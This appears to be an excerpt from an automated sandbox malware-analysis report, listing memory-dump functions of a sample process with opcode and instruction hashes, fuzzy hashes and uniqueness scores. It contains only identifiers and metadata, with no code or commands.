                                                                                        • Instruction ID: 2deb4154714b20e5a0472920f10ae3bf3768bd19bd5fa47194f8fd01d71d8d97
                                                                                        • Opcode Fuzzy Hash: da6a32e94a3f7c7844bff50d824d800d97b4b5d5479cec692133e533780ea00d
                                                                                        • Instruction Fuzzy Hash: 93014935224304DFC7529F28D8E077ABBA8EB813D1F110977E606C7252DA30CC59C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FD9BB Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0
                                                                                        • API String ID: 0-4108050209
                                                                                        • Opcode ID: f124d6449a380f2db48a36e38af05f2f22fd8d2ec706213b1286b5ac4c40b75c
                                                                                        • Instruction ID: 1c3a6247182822035353b5614f8f22f4734b5fc0f1f0619f77149565bbefb49c
                                                                                        • Opcode Fuzzy Hash: f124d6449a380f2db48a36e38af05f2f22fd8d2ec706213b1286b5ac4c40b75c
                                                                                        • Instruction Fuzzy Hash: F901AD74D2C288CFCB00CFB4C8807F9BBB6AB1A380F1495E6C585A7212D2B48A56CF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0848 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \G&
                                                                                        • API String ID: 0-4157756153
                                                                                        • Opcode ID: 53f158c6146131be4f549e44cf830a6452b050c413d6aae06d6170129c0c4320
                                                                                        • Instruction ID: 9440e94ddf217a963bf068e53d85815650e491f1a89a0bf4cbcff5f0e57b9721
                                                                                        • Opcode Fuzzy Hash: 53f158c6146131be4f549e44cf830a6452b050c413d6aae06d6170129c0c4320
                                                                                        • Instruction Fuzzy Hash: A1012571D2020DAFDB40EFE4D8506AEBBB5EF89300F1089AAD416E7350EB305A559F81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F3FC4 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: f4b87c45ccb97e6cc7c4e5ab871d3a2cf7d4758595ca016c0a37b09099247047
                                                                                        • Instruction ID: 3b2749e442172a3efe377478caa3106a7079e5d7bef5d66159e41c4bbf8da8d1
                                                                                        • Opcode Fuzzy Hash: f4b87c45ccb97e6cc7c4e5ab871d3a2cf7d4758595ca016c0a37b09099247047
                                                                                        • Instruction Fuzzy Hash: 42F0B770921228CBD755EB24C854BE8B3B1AF55340F5142FAE5486B261DB75AAD4CF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F0D09 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: I&
                                                                                        • API String ID: 0-2993644366
                                                                                        • Opcode ID: 942b1d11537fa943556f02952faecf12c02fac1a89b8504ebe89fd3ed13c43b5
                                                                                        • Instruction ID: d2fe1514828de36ff559784f814218cee8acc3ede8eba9138b3565b3793e55a0
                                                                                        • Opcode Fuzzy Hash: 942b1d11537fa943556f02952faecf12c02fac1a89b8504ebe89fd3ed13c43b5
                                                                                        • Instruction Fuzzy Hash: 41E08C301993859FCB6B1BA0A956A227F749B16780F4680E7D649CF0F3E6A1D920C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F67E7 Relevance: .2, Instructions: 226COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e99b199a40b427fca5cdcd60c772b2aac6f85af7c45be52fe3c564c108c64b40
                                                                                        • Instruction ID: a635b6b53945b94e225d75ec5996ccea78c0d74932212fcdfead65f0d3340c0a
                                                                                        • Opcode Fuzzy Hash: e99b199a40b427fca5cdcd60c772b2aac6f85af7c45be52fe3c564c108c64b40
                                                                                        • Instruction Fuzzy Hash: 1981B630B64208DFDB149F64D858BBEB6A2EB84780F244139E606EB394CFB58C55DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F67F1 Relevance: .2, Instructions: 226COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cacaa48b9f297f610163a1aef90e107a64529806b68899fe17a680e24e1b55c2
                                                                                        • Instruction ID: ccc551cd303ea7a91c0213875f0007141fe552ae8ddb876ff51343ff8d2f27b5
                                                                                        • Opcode Fuzzy Hash: cacaa48b9f297f610163a1aef90e107a64529806b68899fe17a680e24e1b55c2
                                                                                        • Instruction Fuzzy Hash: 7E81A630B64208DFDB149F64D859BBEB6A2EB84780F248139E506EB394CFB58C55DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F6899 Relevance: .2, Instructions: 196COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: add541a47b00fa566e187a741ec91f0dc7e3524b68434e29667d375c8dbe9e37
                                                                                        • Instruction ID: 65d565b3cdeb4ebcf13c374c489594a2e608897d341906c73b2b5b988db6a80b
                                                                                        • Opcode Fuzzy Hash: add541a47b00fa566e187a741ec91f0dc7e3524b68434e29667d375c8dbe9e37
                                                                                        • Instruction Fuzzy Hash: F6619330B64208DFEB149B74D859B7EB6A2EB84780F244139F606EB394CFB48C55DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F4288 Relevance: .2, Instructions: 187COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11c699861e2e7b61f4cbbfe8e5fee3ae4d4f4b590dd6ba21980691f7a41671f6
                                                                                        • Instruction ID: 57cd549c9a2b13c0bf4d83e4dce92b64b0d50f43b0b2002dc356419a02a4f0cf
                                                                                        • Opcode Fuzzy Hash: 11c699861e2e7b61f4cbbfe8e5fee3ae4d4f4b590dd6ba21980691f7a41671f6
                                                                                        • Instruction Fuzzy Hash: 2551B2202092E5CFD316DB308DEAB957FE19F52340F18C8DED8858B6A7C6628857CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FD0A8 Relevance: .2, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ccee4880dd80c7c85b1f3580f8e6e4f688fbd8b4ed65acd894ef630e78c82bfe
                                                                                        • Instruction ID: 913967f3356f81f37c11e1a352148b97a26881ecf95919751ddb8a6373bd865b
                                                                                        • Opcode Fuzzy Hash: ccee4880dd80c7c85b1f3580f8e6e4f688fbd8b4ed65acd894ef630e78c82bfe
                                                                                        • Instruction Fuzzy Hash: 67516030B61209DBEB14DBA4D8517BEF7B2BF84744F20812AEA15A7394DB70DD12CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FDA1F Relevance: .1, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3d68fcdde189fdb5264b8c2819a16c61b85926ca3e130fd7bde01e91d405af01
                                                                                        • Instruction ID: 35b373b1da1fac92dd53b43bd26f5f54f438e2c790a8273f060d107b2b346d14
                                                                                        • Opcode Fuzzy Hash: 3d68fcdde189fdb5264b8c2819a16c61b85926ca3e130fd7bde01e91d405af01
                                                                                        • Instruction Fuzzy Hash: DA51D274E1821A8FCB00CFA9D5809AEFBF2BF88344F249565D919E7305E730A952CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F9A91 Relevance: .1, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e00135c11d65e6dc0c953d03ce50dd66d0bb6d1afe5aa747a4c08a06ef70378
                                                                                        • Instruction ID: 1c5789cdca102f6826e612eb045e1dc7b56acfbf38a288db3bced084f3eaef47
                                                                                        • Opcode Fuzzy Hash: 7e00135c11d65e6dc0c953d03ce50dd66d0bb6d1afe5aa747a4c08a06ef70378
                                                                                        • Instruction Fuzzy Hash: 3C41F774E2921DDFCB00CFA8E4849BEFBB4FB4E380B115865D556A7215D7B098A0DB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F9AA0 Relevance: .1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3418ca20928d7c5418052bbc4b70c634ac38594ecda5f4b0ca8dae73b5ed0b1
                                                                                        • Instruction ID: af61be33503bed1e415b42dadbb257c50496b8063ecab245575554f02e8e7e49
                                                                                        • Opcode Fuzzy Hash: e3418ca20928d7c5418052bbc4b70c634ac38594ecda5f4b0ca8dae73b5ed0b1
                                                                                        • Instruction Fuzzy Hash: 55410874E2921DDFCB00CFA8E4849BEFBB4FB4E380B105865D556A7314D7B098A0DB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FA812 Relevance: .1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 176553e977b3f5cecca75db0ae3b92941c323559b57227cc42afa970f2522a07
                                                                                        • Instruction ID: 750753ef769b72184785d3c42e6c16137ecaff7227942a8e5b7edb3de4ee3f75
                                                                                        • Opcode Fuzzy Hash: 176553e977b3f5cecca75db0ae3b92941c323559b57227cc42afa970f2522a07
                                                                                        • Instruction Fuzzy Hash: CA419EB4E25219DFDB14CFA8C884AADFBB1FB49340F209425E90AF7250E770A952CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F88A0 Relevance: .1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 02b190783d82b8b8d52e4a808fdb683030f6f8acbf5496b4a67aca2c2b8d9e51
                                                                                        • Instruction ID: 8119719b94d2d5d41b78ef0efc02442c8767c93154e136d474842e0933f2ae94
                                                                                        • Opcode Fuzzy Hash: 02b190783d82b8b8d52e4a808fdb683030f6f8acbf5496b4a67aca2c2b8d9e51
                                                                                        • Instruction Fuzzy Hash: 2F417A31A24209CFCB008F28C844ABAF7E1EF45380FA484B6E516DB361DB76CC62DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F88B0 Relevance: .1, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e2f28d36dff4688aa4d2cd2b48117f4658bf1a99d386598c2b56fde0c1613c3
                                                                                        • Instruction ID: 353a326a26fbb306064f72ace3562c4c711bbf18fb5d561a989e1ca84dba3d71
                                                                                        • Opcode Fuzzy Hash: 9e2f28d36dff4688aa4d2cd2b48117f4658bf1a99d386598c2b56fde0c1613c3
                                                                                        • Instruction Fuzzy Hash: E1414832A2010DCBCB108F58C845ABEF7E1EF45380FA48476E616AB361DB76DC62DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F8330 Relevance: .1, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: defc94b987943547b672544d0b391ff1684e4a44b558030167b7ca2f797e4c34
                                                                                        • Instruction ID: aedee85e662261fe3f66fb0ad13c45a1434d82b4aa6c041998729919ed1c69e7
                                                                                        • Opcode Fuzzy Hash: defc94b987943547b672544d0b391ff1684e4a44b558030167b7ca2f797e4c34
                                                                                        • Instruction Fuzzy Hash: F741A27292824ECBDB108F69C88467EF7B0BF40380F184977DA26DB2A1DB74D821C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F9AC7 Relevance: .1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 98403ea72242ff5b790e82e4162870989085af8c92f5883fb5d37e1eb7bef3ed
                                                                                        • Instruction ID: 3fbbcaf41644d3eb444a88e124d39d3cf5f716d89924c69ffea91713028c31eb
                                                                                        • Opcode Fuzzy Hash: 98403ea72242ff5b790e82e4162870989085af8c92f5883fb5d37e1eb7bef3ed
                                                                                        • Instruction Fuzzy Hash: CC410674E3921DDFCB00CFA8E4849BDFBB4FB0E390B2058A5D556A7210D7B098A0DB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F3068 Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2273e373ce1d71eada0182e99a7279458b539d10d0ac5f4a436aa997f46661cd
                                                                                        • Instruction ID: 60cb177ab9004e24177811ea56ba7942f783d4f3babaada8d9ffc34e467f7eb4
                                                                                        • Opcode Fuzzy Hash: 2273e373ce1d71eada0182e99a7279458b539d10d0ac5f4a436aa997f46661cd
                                                                                        • Instruction Fuzzy Hash: B131E231A34218CBDB11DF58C880A7AF7B4EB40780F14847BEA199B351D7B0CE60CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FE1C0 Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4db13eb26690c260a8bfe6bfe5e3a48e3313d5fd4357273ed82e99902973bbb1
                                                                                        • Instruction ID: 2543a5eade00aed117f724a14d2865af5830b9e1410daca295751c3e483e3743
                                                                                        • Opcode Fuzzy Hash: 4db13eb26690c260a8bfe6bfe5e3a48e3313d5fd4357273ed82e99902973bbb1
                                                                                        • Instruction Fuzzy Hash: D5311430A20259CBCB218F7AD8446BBF7F5FB44340F56817BEAAA872A1D374D850C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F8F08 Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f76ba3e270c63ab6c68c63682ac6f460d414900095b3ed53988a30861d84c1fd
                                                                                        • Instruction ID: 436124c912934ba9de7b0f79d6a15b3ffb51b5f4eb6da11b31c0b5b3f1784d64
                                                                                        • Opcode Fuzzy Hash: f76ba3e270c63ab6c68c63682ac6f460d414900095b3ed53988a30861d84c1fd
                                                                                        • Instruction Fuzzy Hash: DC31C131A2820ACFC710CF58C880ABEF7B6FF45380F548276E616CB690DB78D9618B51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FBF55 Relevance: .1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2dc245cee0001495acdcd0a24182404d2082e6e854d053abfd7719494d01148b
                                                                                        • Instruction ID: b19d849dfaee4dc48665665d7a69d599693fa9fe2a261bb5d2df3fc427fc7084
                                                                                        • Opcode Fuzzy Hash: 2dc245cee0001495acdcd0a24182404d2082e6e854d053abfd7719494d01148b
                                                                                        • Instruction Fuzzy Hash: C7316635A20119CBCB05CF68DC80BF9F3A5AB88751F18C277EA19EB6A1C774D8608B10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F6C50 Relevance: .1, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c32bc5071f0521ae8498cbad8f7d64b10c6c1e56a1240f5ddc51e6bbf300767d
                                                                                        • Instruction ID: 023d49f7d1cc09753a9a0a515011180f2a5fac7c4f98417bed72f2c5a08dae01
                                                                                        • Opcode Fuzzy Hash: c32bc5071f0521ae8498cbad8f7d64b10c6c1e56a1240f5ddc51e6bbf300767d
                                                                                        • Instruction Fuzzy Hash: 6331A13162461ACBD720CB29C8482B9F7B5FF45341F158233E294C7295D3749860C762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FC101 Relevance: .1, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f202579e4478f5ee5090ea8e63cb03c915e77a45ac1d396e23c75811735f214d
                                                                                        • Instruction ID: cb80986fcd1cd4646479c79a2e17d9326b3d09e072b0d7f0df2a228c9e3478a1
                                                                                        • Opcode Fuzzy Hash: f202579e4478f5ee5090ea8e63cb03c915e77a45ac1d396e23c75811735f214d
                                                                                        • Instruction Fuzzy Hash: 58317B74E1421D8FCB40CFA9C981AEEFBF1AB49350F24846AD919E7301D3349A558F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002FA85D Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f79aecc0677035d7b5ab32ef006e1dfcd19fdee27a998c8bc3769702a866bff0
                                                                                        • Instruction ID: d67f0711de58bfdb31fb0125288571962a7642410be56fd9df8eeeee427ed344
                                                                                        • Opcode Fuzzy Hash: f79aecc0677035d7b5ab32ef006e1dfcd19fdee27a998c8bc3769702a866bff0
                                                                                        • Instruction Fuzzy Hash: 34311674A14119CFDB50DFA8C885AEDFBB1FB49340F2094AAD80AB7241D7719E82DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F6C40 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39c078bc5ef27477a712b6acbc4e6fd2c3fe1e3487282ad66912aa8b75247768
                                                                                        • Instruction ID: a9478cb42324ea5518e21d3c1cadd48e9c902d11d67971adf833548d2b82d2f9
                                                                                        • Opcode Fuzzy Hash: 39c078bc5ef27477a712b6acbc4e6fd2c3fe1e3487282ad66912aa8b75247768
                                                                                        • Instruction Fuzzy Hash: CF21B1316246198BD720CF68D8086BAF7F5FB85351F15C277D195CB2A5C3349960CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 002F8FE0 Relevance: .1, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371709875.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2f0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: efde3d3fe88eed545d6b9407dc7953aa382d689006bc9b1ee8f8ea3818e89724
                                                                                        • Instruction ID: e9d49cc8638173fd6401df429e247952e780541564f86f91239b4db74217685d
                                                                                        • Opcode Fuzzy Hash: efde3d3fe88eed545d6b9407dc7953aa382d689006bc9b1ee8f8ea3818e89724
                                                                                        • Instruction Fuzzy Hash: 9721513163450ECFD7108F58C880BBEF3A2BF44390F688276E616C7A90DB79D9A59611
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0026D294 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371680445.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_26d000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b80292d1d3dc2b0b3f3eb2e79eb13c9d2cbc272267462e32c77e26ba00ea0d6
                                                                                        • Instruction ID: 69d238b5e3942ea9a10d30ebc12ece5cb3995fce3a0d87544e4ddbd7dfd63008
                                                                                        • Opcode Fuzzy Hash: 2b80292d1d3dc2b0b3f3eb2e79eb13c9d2cbc272267462e32c77e26ba00ea0d6
                                                                                        • Instruction Fuzzy Hash: D321B375A24248DFDB04CF10D9C4B26BBA5FB84714F34C5A9D8494B346C37AD8A6CF62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0026D0DC Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.371680445.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_26d000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fd93a7b13580c34117085d6d602bbc68556141cc70697e0a69d61c558ebb0302
                                                                                        • Instruction ID: 7a96ded147af2dc6fc1d47aefa77949b8f47a9916c5e2373c30fb59def74b3cf
